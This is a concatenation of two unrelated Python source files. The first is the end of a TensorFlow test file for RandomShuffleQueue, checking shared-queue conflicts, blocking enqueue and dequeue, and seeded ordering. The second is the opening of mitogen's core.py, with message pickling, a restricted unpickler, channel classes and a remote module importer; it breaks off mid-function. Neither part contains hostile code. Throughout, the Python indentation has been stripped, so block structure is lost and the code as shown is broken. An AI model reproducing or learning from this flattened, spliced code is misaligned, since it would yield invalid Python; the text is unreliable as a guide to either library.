# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
core.py | # Copyright 2017, David Wilson
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
This module implements most package functionality, but remains separate from
non-essential code in order to reduce its size, since it is also serves as the
bootstrap implementation sent to every new slave context.
"""
import collections
import encodings.latin_1
import errno
import fcntl
import imp
import itertools
import logging
import os
import signal
import socket
import struct
import sys
import threading
import time
import traceback
import warnings
import weakref
import zlib
# Absolute imports for <2.5.
select = __import__('select')
try:
import cPickle as pickle
except ImportError:
import pickle
try:
from cStringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
# TODO: usage of 'import' after setting __name__, but before fixing up
# sys.modules generates a warning. This happens when profiling = True.
warnings.filterwarnings('ignore',
"Parent module 'mitogen' not found while handling absolute import")
LOG = logging.getLogger('mitogen')
IOLOG = logging.getLogger('mitogen.io')
IOLOG.setLevel(logging.INFO)
LATIN1_CODEC = encodings.latin_1.Codec()
_v = False
_vv = False
GET_MODULE = 100
CALL_FUNCTION = 101
FORWARD_LOG = 102
ADD_ROUTE = 103
DEL_ROUTE = 104
ALLOCATE_ID = 105
SHUTDOWN = 106
LOAD_MODULE = 107
FORWARD_MODULE = 108
DETACHING = 109
CALL_SERVICE = 110
IS_DEAD = 999
try:
BaseException
except NameError:
BaseException = Exception
PY3 = sys.version_info > (3,)
if PY3:
b = str.encode
BytesType = bytes
UnicodeType = str
FsPathTypes = (str,)
BufferType = lambda buf, start: memoryview(buf)[start:]
long = int
else:
b = str
BytesType = str
FsPathTypes = (str, unicode)
BufferType = buffer
UnicodeType = unicode
AnyTextType = (BytesType, UnicodeType)
if sys.version_info < (2, 5):
next = lambda it: it.next()
#: Default size for calls to :meth:`Side.read` or :meth:`Side.write`, and the
#: size of buffers configured by :func:`mitogen.parent.create_socketpair`. This
#: value has many performance implications, 128KiB seems to be a sweet spot.
#:
#: * When set low, large messages cause many :class:`Broker` IO loop
#: iterations, burning CPU and reducing throughput.
#: * When set high, excessive RAM is reserved by the OS for socket buffers (2x
#: per child), and an identically sized temporary userspace buffer is
#: allocated on each read that requires zeroing, and over a particular size
#: may require two system calls to allocate/deallocate.
#:
#: Care must be taken to ensure the underlying kernel object and receiving
#: program support the desired size. For example,
#:
#: * Most UNIXes have TTYs with fixed 2KiB-4KiB buffers, making them unsuitable
#: for efficient IO.
#: * Different UNIXes have varying presets for pipes, which may not be
#: configurable. On recent Linux the default pipe buffer size is 64KiB, but
#: under memory pressure may be as low as 4KiB for unprivileged processes.
#: * When communication is via an intermediary process, its internal buffers
#: effect the speed OS buffers will drain. For example OpenSSH uses 64KiB
#: reads.
#:
#: An ideal :class:`Message` has a size that is a multiple of
#: :data:`CHUNK_SIZE` inclusive of headers, to avoid wasting IO loop iterations
#: writing small trailer chunks.
CHUNK_SIZE = 131072
_tls = threading.local()
if __name__ == 'mitogen.core':
# When loaded using import mechanism, ExternalContext.main() will not have
# a chance to set the synthetic mitogen global, so just import it here.
import mitogen
else:
# When loaded as __main__, ensure classes and functions gain a __module__
# attribute consistent with the host process, so that pickling succeeds.
__name__ = 'mitogen.core'
class Error(Exception):
"""Base for all exceptions raised by Mitogen.
:param str fmt:
Exception text, or format string if `args` is non-empty.
:param tuple args:
Format string arguments.
"""
def __init__(self, fmt=None, *args):
if args:
fmt %= args
if fmt and not isinstance(fmt, UnicodeType):
fmt = fmt.decode('utf-8')
Exception.__init__(self, fmt)
class LatchError(Error):
"""Raised when an attempt is made to use a :py:class:`mitogen.core.Latch`
that has been marked closed."""
pass
class Blob(BytesType):
"""A serializable bytes subclass whose content is summarized in repr()
output, making it suitable for logging binary data."""
def __repr__(self):
return '[blob: %d bytes]' % len(self)
def __reduce__(self):
return (Blob, (BytesType(self),))
class Secret(UnicodeType):
"""A serializable unicode subclass whose content is masked in repr()
output, making it suitable for logging passwords."""
def __repr__(self):
return '[secret]'
if not PY3:
# TODO: what is this needed for in 2.x?
def __str__(self):
return UnicodeType(self)
def __reduce__(self):
return (Secret, (UnicodeType(self),))
class Kwargs(dict):
"""A serializable dict subclass that indicates the contained keys should be
be coerced to Unicode on Python 3 as required. Python 2 produces keyword
argument dicts whose keys are bytestrings, requiring a helper to ensure
compatibility with Python 3."""
if PY3:
def __init__(self, dct):
for k, v in dct.items():
if type(k) is bytes:
self[k.decode()] = v
else:
self[k] = v
def __repr__(self):
return 'Kwargs(%s)' % (dict.__repr__(self),)
def __reduce__(self):
return (Kwargs, (dict(self),))
class CallError(Error):
"""Serializable :class:`Error` subclass raised when
:py:meth:`Context.call() <mitogen.parent.Context.call>` fails. A copy of
the traceback from the external context is appended to the exception
message."""
def __init__(self, fmt=None, *args):
if not isinstance(fmt, BaseException):
Error.__init__(self, fmt, *args)
else:
e = fmt
fmt = '%s.%s: %s' % (type(e).__module__, type(e).__name__, e)
args = ()
tb = sys.exc_info()[2]
if tb:
fmt += '\n'
fmt += ''.join(traceback.format_tb(tb))
Error.__init__(self, fmt)
def __reduce__(self):
return (_unpickle_call_error, (self.args[0],))
def _unpickle_call_error(s):
if not (type(s) is UnicodeType and len(s) < 10000):
raise TypeError('cannot unpickle CallError: bad input')
inst = CallError.__new__(CallError)
Exception.__init__(inst, s)
return inst
class ChannelError(Error):
"""Raised when a channel dies or has been closed."""
remote_msg = 'Channel closed by remote end.'
local_msg = 'Channel closed by local end.'
class StreamError(Error):
"""Raised when a stream cannot be established."""
pass
class TimeoutError(Error):
"""Raised when a timeout occurs on a stream."""
pass
def to_text(o):
"""Coerce `o` to Unicode by decoding it from UTF-8 if it is an instance of
:class:`bytes`, otherwise pass it to the :class:`str` constructor. The
returned object is always a plain :class:`str`, any subclass is removed."""
if isinstance(o, BytesType):
return o.decode('utf-8')
return UnicodeType(o)
def has_parent_authority(msg, _stream=None):
"""Policy function for use with :class:`Receiver` and
:meth:`Router.add_handler` that requires incoming messages to originate
from a parent context, or on a :class:`Stream` whose :attr:`auth_id
<Stream.auth_id>` has been set to that of a parent context or the current
context."""
return (msg.auth_id == mitogen.context_id or
msg.auth_id in mitogen.parent_ids)
def listen(obj, name, func):
"""
Arrange for `func(*args, **kwargs)` to be invoked when the named signal is
fired by `obj`.
"""
signals = vars(obj).setdefault('_signals', {})
signals.setdefault(name, []).append(func)
def fire(obj, name, *args, **kwargs):
"""
Arrange for `func(*args, **kwargs)` to be invoked for every function
registered for the named signal on `obj`.
"""
signals = vars(obj).get('_signals', {})
return [func(*args, **kwargs) for func in signals.get(name, ())]
def takes_econtext(func):
func.mitogen_takes_econtext = True
return func
def takes_router(func):
func.mitogen_takes_router = True
return func
def is_blacklisted_import(importer, fullname):
"""
Return :data:`True` if `fullname` is part of a blacklisted package, or if
any packages have been whitelisted and `fullname` is not part of one.
NB:
- If a package is on both lists, then it is treated as blacklisted.
- If any package is whitelisted, then all non-whitelisted packages are
treated as blacklisted.
"""
return ((not any(fullname.startswith(s) for s in importer.whitelist)) or
(any(fullname.startswith(s) for s in importer.blacklist)))
def set_cloexec(fd):
"""Set the file descriptor `fd` to automatically close on
:func:`os.execve`. This has no effect on file descriptors inherited across
:func:`os.fork`, they must be explicitly closed through some other means,
such as :func:`mitogen.fork.on_fork`."""
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert fd > 2
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
def set_nonblock(fd):
"""Set the file descriptor `fd` to non-blocking mode. For most underlying
file types, this causes :func:`os.read` or :func:`os.write` to raise
:class:`OSError` with :data:`errno.EAGAIN` rather than block the thread
when the underlying kernel buffer is exhausted."""
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def set_block(fd):
"""Inverse of :func:`set_nonblock`, i.e. cause `fd` to block the thread
when the underlying kernel buffer is exhausted."""
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
def io_op(func, *args):
"""Wrap `func(*args)` that may raise :class:`select.error`,
:class:`IOError`, or :class:`OSError`, trapping UNIX error codes relating
to disconnection and retry events in various subsystems:
* When a signal is delivered to the process on Python 2, system call retry
is signalled through :data:`errno.EINTR`. The invocation is automatically
restarted.
* When performing IO against a TTY, disconnection of the remote end is
signalled by :data:`errno.EIO`.
* When performing IO against a socket, disconnection of the remote end is
signalled by :data:`errno.ECONNRESET`.
* When performing IO against a pipe, disconnection of the remote end is
signalled by :data:`errno.EPIPE`.
:returns:
Tuple of `(return_value, disconnected)`, where `return_value` is the
return value of `func(\*args)`, and `disconnected` is :data:`True` if
disconnection was detected, otherwise :data:`False`.
"""
while True:
try:
return func(*args), False
except (select.error, OSError, IOError):
e = sys.exc_info()[1]
_vv and IOLOG.debug('io_op(%r) -> OSError: %s', func, e)
if e.args[0] == errno.EINTR:
continue
if e.args[0] in (errno.EIO, errno.ECONNRESET, errno.EPIPE):
return None, True
raise
class PidfulStreamHandler(logging.StreamHandler):
"""A :class:`logging.StreamHandler` subclass used when
:meth:`Router.enable_debug() <mitogen.master.Router.enable_debug>` has been
called, or the `debug` parameter was specified during context construction.
Verifies the process ID has not changed on each call to :meth:`emit`,
reopening the associated log file when a change is detected.
This ensures logging to the per-process output files happens correctly even
when uncooperative third party components call :func:`os.fork`.
"""
#: PID that last opened the log file.
open_pid = None
#: Output path template.
template = '/tmp/mitogen.%s.%s.log'
def _reopen(self):
self.acquire()
try:
if self.open_pid == os.getpid():
return
ts = time.strftime('%Y%m%d_%H%M%S')
path = self.template % (os.getpid(), ts)
self.stream = open(path, 'w', 1)
set_cloexec(self.stream.fileno())
self.stream.write('Parent PID: %s\n' % (os.getppid(),))
self.stream.write('Created by:\n\n%s\n' % (
''.join(traceback.format_stack()),
))
self.open_pid = os.getpid()
finally:
self.release()
def emit(self, record):
if self.open_pid != os.getpid():
self._reopen()
logging.StreamHandler.emit(self, record)
def enable_debug_logging():
global _v, _vv
_v = True
_vv = True
root = logging.getLogger()
root.setLevel(logging.DEBUG)
IOLOG.setLevel(logging.DEBUG)
handler = PidfulStreamHandler()
handler.formatter = logging.Formatter(
'%(asctime)s %(levelname).1s %(name)s: %(message)s',
'%H:%M:%S'
)
root.handlers.insert(0, handler)
_profile_hook = lambda name, func, *args: func(*args)
def enable_profiling():
global _profile_hook
import cProfile
import pstats
def _profile_hook(name, func, *args):
profiler = cProfile.Profile()
profiler.enable()
try:
return func(*args)
finally:
profiler.dump_stats('/tmp/mitogen.%d.%s.pstat' % (os.getpid(), name))
profiler.create_stats()
fp = open('/tmp/mitogen.stats.%d.%s.log' % (os.getpid(), name), 'w')
try:
stats = pstats.Stats(profiler, stream=fp)
stats.sort_stats('cumulative')
stats.print_stats()
finally:
fp.close()
def import_module(modname):
"""
Import `module` and return the attribute named `attr`.
"""
return __import__(modname, None, None, [''])
if PY3:
# In 3.x Unpickler is a class exposing find_class as an overridable, but it
# cannot be overridden without subclassing.
class _Unpickler(pickle.Unpickler):
def find_class(self, module, func):
return self.find_global(module, func)
else:
# In 2.x Unpickler is a function exposing a writeable find_global
# attribute.
_Unpickler = pickle.Unpickler
class Message(object):
dst_id = None
src_id = None
auth_id = None
handle = None
reply_to = None
data = b('')
_unpickled = object()
router = None
receiver = None
def __init__(self, **kwargs):
self.src_id = mitogen.context_id
self.auth_id = mitogen.context_id
vars(self).update(kwargs)
assert isinstance(self.data, BytesType)
def _unpickle_context(self, context_id, name):
return _unpickle_context(self.router, context_id, name)
def _unpickle_sender(self, context_id, dst_handle):
return _unpickle_sender(self.router, context_id, dst_handle)
def _unpickle_bytes(self, s, encoding):
s, n = LATIN1_CODEC.encode(s)
return s
def _find_global(self, module, func):
"""Return the class implementing `module_name.class_name` or raise
`StreamError` if the module is not whitelisted."""
if module == __name__:
if func == '_unpickle_call_error':
return _unpickle_call_error
elif func == '_unpickle_sender':
return self._unpickle_sender
elif func == '_unpickle_context':
return self._unpickle_context
elif func == 'Blob':
return Blob
elif func == 'Secret':
return Secret
elif func == 'Kwargs':
return Kwargs
elif module == '_codecs' and func == 'encode':
return self._unpickle_bytes
elif module == '__builtin__' and func == 'bytes':
return BytesType
raise StreamError('cannot unpickle %r/%r', module, func)
@property
def is_dead(self):
return self.reply_to == IS_DEAD
@classmethod
def dead(cls, **kwargs):
return cls(reply_to=IS_DEAD, **kwargs)
@classmethod
def pickled(cls, obj, **kwargs):
self = cls(**kwargs)
try:
self.data = pickle.dumps(obj, protocol=2)
except pickle.PicklingError:
e = sys.exc_info()[1]
self.data = pickle.dumps(CallError(e), protocol=2)
return self
def reply(self, msg, router=None, **kwargs):
if not isinstance(msg, Message):
msg = Message.pickled(msg)
msg.dst_id = self.src_id
msg.handle = self.reply_to
vars(msg).update(kwargs)
if msg.handle:
(self.router or router).route(msg)
else:
LOG.debug('Message.reply(): discarding due to zero handle: %r', msg)
if PY3:
UNPICKLER_KWARGS = {'encoding': 'bytes'}
else:
UNPICKLER_KWARGS = {}
def unpickle(self, throw=True, throw_dead=True):
"""Deserialize `data` into an object."""
_vv and IOLOG.debug('%r.unpickle()', self)
if throw_dead and self.is_dead:
raise ChannelError(ChannelError.remote_msg)
obj = self._unpickled
if obj is Message._unpickled:
fp = BytesIO(self.data)
unpickler = _Unpickler(fp, **self.UNPICKLER_KWARGS)
unpickler.find_global = self._find_global
try:
# Must occur off the broker thread.
obj = unpickler.load()
self._unpickled = obj
except (TypeError, ValueError):
e = sys.exc_info()[1]
raise StreamError('invalid message: %s', e)
if throw:
if isinstance(obj, CallError):
raise obj
return obj
def __repr__(self):
return 'Message(%r, %r, %r, %r, %r, %r..%d)' % (
self.dst_id, self.src_id, self.auth_id, self.handle,
self.reply_to, (self.data or '')[:50], len(self.data)
)
class Sender(object):
def __init__(self, context, dst_handle):
self.context = context
self.dst_handle = dst_handle
def __repr__(self):
return 'Sender(%r, %r)' % (self.context, self.dst_handle)
def __reduce__(self):
return _unpickle_sender, (self.context.context_id, self.dst_handle)
def close(self):
"""Indicate this channel is closed to the remote side."""
_vv and IOLOG.debug('%r.close()', self)
self.context.send(Message.dead(handle=self.dst_handle))
def send(self, data):
"""Send `data` to the remote."""
_vv and IOLOG.debug('%r.send(%r..)', self, repr(data)[:100])
self.context.send(Message.pickled(data, handle=self.dst_handle))
def _unpickle_sender(router, context_id, dst_handle):
if not (isinstance(router, Router) and
isinstance(context_id, (int, long)) and context_id >= 0 and
isinstance(dst_handle, (int, long)) and dst_handle > 0):
raise TypeError('cannot unpickle Sender: bad input')
return Sender(Context(router, context_id), dst_handle)
class Receiver(object):
notify = None
raise_channelerror = True
def __init__(self, router, handle=None, persist=True,
respondent=None, policy=None):
self.router = router
self.handle = handle # Avoid __repr__ crash in add_handler()
self._latch = Latch() # Must exist prior to .add_handler()
self.handle = router.add_handler(
fn=self._on_receive,
handle=handle,
policy=policy,
persist=persist,
respondent=respondent,
)
def __repr__(self):
return 'Receiver(%r, %r)' % (self.router, self.handle)
def to_sender(self):
context = Context(self.router, mitogen.context_id)
return Sender(context, self.handle)
def _on_receive(self, msg):
"""Callback from the Stream; appends data to the internal queue."""
_vv and IOLOG.debug('%r._on_receive(%r)', self, msg)
self._latch.put(msg)
if self.notify:
self.notify(self)
def close(self):
if self.handle:
self.router.del_handler(self.handle)
self.handle = None
self._latch.put(Message.dead())
def empty(self):
return self._latch.empty()
def get(self, timeout=None, block=True, throw_dead=True):
_vv and IOLOG.debug('%r.get(timeout=%r, block=%r)', self, timeout, block)
msg = self._latch.get(timeout=timeout, block=block)
if msg.is_dead and throw_dead:
if msg.src_id == mitogen.context_id:
raise ChannelError(ChannelError.local_msg)
else:
raise ChannelError(ChannelError.remote_msg)
return msg
def __iter__(self):
while True:
msg = self.get(throw_dead=False)
if msg.is_dead:
return
yield msg
class Channel(Sender, Receiver):
def __init__(self, router, context, dst_handle, handle=None):
Sender.__init__(self, context, dst_handle)
Receiver.__init__(self, router, handle)
def __repr__(self):
return 'Channel(%s, %s)' % (
Sender.__repr__(self),
Receiver.__repr__(self)
)
class Importer(object):
"""
Import protocol implementation that fetches modules from the parent
process.
:param context: Context to communicate via.
"""
def __init__(self, router, context, core_src, whitelist=(), blacklist=()):
self._context = context
self._present = {'mitogen': [
'compat',
'debug',
'doas',
'docker',
'fakessh',
'fork',
'jail',
'lxc',
'lxd',
'master',
'minify',
'parent',
'select',
'service',
'setns',
'ssh',
'su',
'sudo',
'utils',
]}
self._lock = threading.Lock()
self.whitelist = list(whitelist) or ['']
self.blacklist = list(blacklist) + [
# 2.x generates needless imports for 'builtins', while 3.x does the
# same for '__builtin__'. The correct one is built-in, the other
# always a negative round-trip.
'builtins',
'__builtin__',
# org.python.core imported by copy, pickle, xml.sax; breaks Jython,
# but very unlikely to trigger a bug report.
'org',
]
if PY3:
self.blacklist += ['cStringIO']
# Presence of an entry in this map indicates in-flight GET_MODULE.
self._callbacks = {}
self._cache = {}
if core_src:
self._cache['mitogen.core'] = (
'mitogen.core',
None,
'mitogen/core.py',
zlib.compress(core_src, 9),
[],
)
self._install_handler(router)
def _install_handler(self, router):
router.add_handler(
fn=self._on_load_module,
handle=LOAD_MODULE,
policy=has_parent_authority,
)
def __repr__(self):
return 'Importer()'
def builtin_find_module(self, fullname):
# imp.find_module() will always succeed for __main__, because it is a
# built-in module. That means it exists on a special linked list deep
# within the bowels of the interpreter. We must special case it.
if fullname == '__main__':
raise ImportError()
parent, _, modname = fullname.rpartition('.')
if parent:
path = sys.modules[parent].__path__
else:
path = None
fp, pathname, description = imp.find_module(modname, path)
if fp:
fp.close()
def find_module(self, fullname, path=None):
if hasattr(_tls, 'running'):
return None
_tls.running = True
try:
_v and LOG.debug('%r.find_module(%r)', self, fullname)
pkgname, dot, _ = fullname.rpartition('.')
pkg = sys.modules.get(pkgname)
if pkgname and getattr(pkg, '__loader__', None) is not self:
LOG.debug('%r: %r is submodule of a package we did not load',
self, fullname)
return None
suffix = fullname[len(pkgname+dot):]
if pkgname and suffix not in self._present.get(pkgname, ()):
LOG.debug('%r: master doesn\'t know %r', self, fullname)
return None
# #114: explicitly whitelisted prefixes override any
# system-installed package.
if self.whitelist != ['']:
if any(fullname.startswith(s) for s in self.whitelist):
return self
try:
self.builtin_find_module(fullname)
_vv and IOLOG.debug('%r: %r is available locally',
self, fullname)
except ImportError:
